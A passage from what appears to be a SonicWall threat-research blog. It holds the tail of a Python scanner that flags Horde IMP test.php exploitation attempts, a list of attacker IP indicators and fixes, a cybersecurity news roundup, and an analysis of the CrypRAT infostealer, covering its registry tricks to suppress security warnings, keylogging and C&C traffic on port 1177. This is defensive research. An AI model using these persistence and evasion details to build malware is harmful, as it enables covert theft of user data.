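    ("POST", "/horde/imp/test.php", urlencode([   # a genuine use of the debug page
        ("server", "imap.example.org"), ("port", "143"), ("user", "a"),
        ("passwd", "a"), ("server_type", "imap"), ("f_submit", "Submit"),
    ])),
    ("GET", "/horde/imp/test.php", ""),            # just viewing the page
]


def scan(requests: List[Tuple[str, str, str]]) -> List[int]:
    """Indices of requests that match the exploit pattern."""
    return [i for i, (m, p, b) in enumerate(requests) if is_imap_open_exploit(m, p, b)]


if __name__ == "__main__":
    print(scan(SAMPLE_REQUESTS))
```

Because the debug page has no legitimate production use, a stricter rule is to alert on any request to /imp/test.php at all; the option-injection check above is for sites that cannot remove the page immediately and want to separate exploitation attempts from scanning.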

Trend Chart:

Find below the attempts made in the last 48 hours. 

Attacker IPs:

Given below are some of the source IPs from which the exploit requests were sent. Treat them as hunting indicators rather than attribution: some may belong to proxies, CDNs or scanning services rather than the originating host.

109.237.27.71
98.6.233.234
173.8.113.97
34.195.252.116
85.25.198.121
103.233.146.6
98.188.240.147
162.158.63.144
203.180.245.92
173.237.133.206
23.210.6.109
45.33.62.197
85.25.100.197
162.243.224.192
212.48.68.180
200.160.158.244
149.126.78.3
162.158.154.95
81.169.158.6
23.35.150.55
51.254.28.132
150.95.169.224
162.158.77.240
139.99.5.223
185.18.197.75
162.158.90.10

Fix:

  • Upgrade to a fixed PHP version. Check for vulnerable PHP versions here: https://www.securityfocus.com/bid/106018
  • Delete the debug page test.php (‘http://horde_path/imp/test.php’) after installation; it has no production use.
  • Until both are done, block or alert on requests to /imp/test.php at the web server or WAF.

SonicWall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13996 Horde Imp Remote Code Execution 1
  • IPS: 13997 Horde Imp Remote Code Execution 2
  • IPS: 13998 Horde Imp Remote Code Execution 3
  • WAF: 1690 Horde Imp Remote Code Execution

Cyber Security News & Trends – 01-25-19

This week, fears are growing that new 5G industrial robots are vulnerable to cyberattack, the numbers affected by a breach jump from 500 to over 500,000 and the government shutdown continues to worry cybersecurity experts.


SonicWall Spotlight

SonicWall on Winning the Cyber Arms Race – Tahawul Tech

  • SonicWall’s Michael Berg is interviewed talking SonicWall’s expansion in Dubai, the cyber arms race and where SonicWall is going in 2019.

Cyber Security News

Why Cybersecurity Must Be a Top Priority for Small & Midsize Businesses – Dark Reading

  • Big corporations seize the cyberattack headlines, but Dark Reading argues that cybersecurity must be a top priority for small and medium businesses, outlining the major security risks and methods of protection.

For Industrial Robots, Hacking Risks Are on the Rise  – Wall Street Journal

  • 5G and the Internet of Things promise to make factories a lot smarter, but also a lot more vulnerable to cyberattacks.

New Ransomware Poses as Games and Software to Trick You Into Downloading It – ZDNet

  • A dangerous new ransomware dubbed Anatova, found at the start of the year, is being watched closely by researchers. Its modular architecture makes it easily adaptable and potentially very dangerous in the hands of a skilled cybercriminal.

The Shutdown Is Exposing Our Economy to Crippling Cybersecurity Breaches – Salon

  • Salon details the infrastructural cybersecurity problems, many previously outlined by SonicWall, that have been growing with the ongoing government shutdown.

Proposed Law Classifies Ransomware Infection as a Data Breach – SecurityWeek

  • The Act to Strengthen Identity Theft Protections in North Carolina proposes widening the definition of a breach to include ransomware and even unauthorized access. The legislation requires tightened data protection and a quicker notifications period when there is a breach.

Online Casino Group Leaks Information on 108 Million Bets, Including User Details – ZDNet

  • An online casino group's server was left exposed online, leaking information on 108 million bets, including complete customer data such as real names, addresses, phone numbers, email addresses, birth dates and more.

Victim Count in Alaska Health Department Breach Soars – BankInfoSecurity

  • It was originally thought to only affect 501 people but the numbers in the Alaska Health Department breach of June 2018 have soared to up to 700,000. The number has soared after months of analysis and confirmation, the DHSS says they always knew the number would rise dramatically after analysis.

Recession Is the Number One Fear for CEOs in 2019, Survey Says – CNBC

  • While recession is the number one fear worldwide, a survey of over 800 CEOs found that cybersecurity was the number one fear for CEOs in the U.S.

Cybercriminals Home in on Ultra-High Net Worth Individuals – Dark Reading

  • With a growing cybersecurity awareness in businesses new research is suggesting that some hackers are shifting their sights to the estates and businesses of wealthy families with personalized cyberattacks.


CrypRAT Infostealer actively spreading in the wild

The SonicWall Capture Labs Threat Research Team has observed reports of a new variant of the CrypRAT Infostealer family [CrypRAT.A] actively spreading in the wild.

 

Memory Snapshot of the CrypRAT Infostealer ( Raw and Encrypted Data )

Infection Cycle:

The Malware adds the following file to the system:

  • Malware.exe
    • %APPDATA%\roaming\system.exe

The Malware adds the following keys to the Windows registry:

  • HKEY_CURRENT_USER\Environment\SEE_MASK_NOZONECHECKS
    • 1 (setting this environment variable suppresses the "Open File - Security Warning" prompt for files that carry a Mark-of-the-Web, so dropped components launch without the attachment warning)
  • [HKEY_CURRENT_USER\Software\061c2e9167603fb87dafebfaad0bb29a]
    • Keylogger data

Once the computer is compromised, the Malware installs the following components to record the user's activity via keylogging and clipboard capture:

 

The Malware terminates the self-extractor process and installs System.exe [the keylogger module] on the target system.

 

The Malware saves the raw captured data under the registry key listed above:

The Malware checks if data is available for transfer to the command and control (C&C) server every 10 seconds.

The Malware encodes its strings and its network communication with base64 (which obscures but does not encrypt them); here is an example:

 

Command and Control (C&C) Traffic

CrypRAT.A performs C&C communication over port 1177 and transfers the stolen data in base64 form; here are some examples:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: CrypRAT.A (Trojan)